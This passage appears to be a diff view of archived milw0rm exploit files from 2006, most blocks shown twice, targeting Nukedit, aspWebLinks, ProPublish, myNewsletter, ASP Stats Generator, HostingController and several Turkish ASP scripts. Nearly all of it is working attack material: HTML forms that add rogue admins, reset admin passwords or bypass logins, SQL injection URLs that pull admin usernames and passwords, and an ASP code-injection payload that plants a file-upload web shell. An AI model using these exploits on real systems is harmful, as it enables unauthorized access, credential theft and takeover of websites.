<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]

View file

@ -1,79 +1,79 @@
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]

View file

@ -1,8 +1,8 @@
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]

View file

@ -1,12 +1,12 @@
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]

View file

@ -12,5 +12,5 @@
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11]
# milw0rm.com [2006-06-11]

View file

@ -1,9 +1,9 @@
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]

View file

@ -1,51 +1,51 @@
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ...
Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19]
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ...
Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19]

View file

@ -1,181 +1,181 @@
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------
<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
-------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06]
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------
<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
-------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06]

View file

@ -1,12 +1,12 @@
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org
#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07]
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org
#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07]

View file

@ -1,22 +1,22 @@
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: admin@asianeagle.org #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw0rm.com [2006-08-14]
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
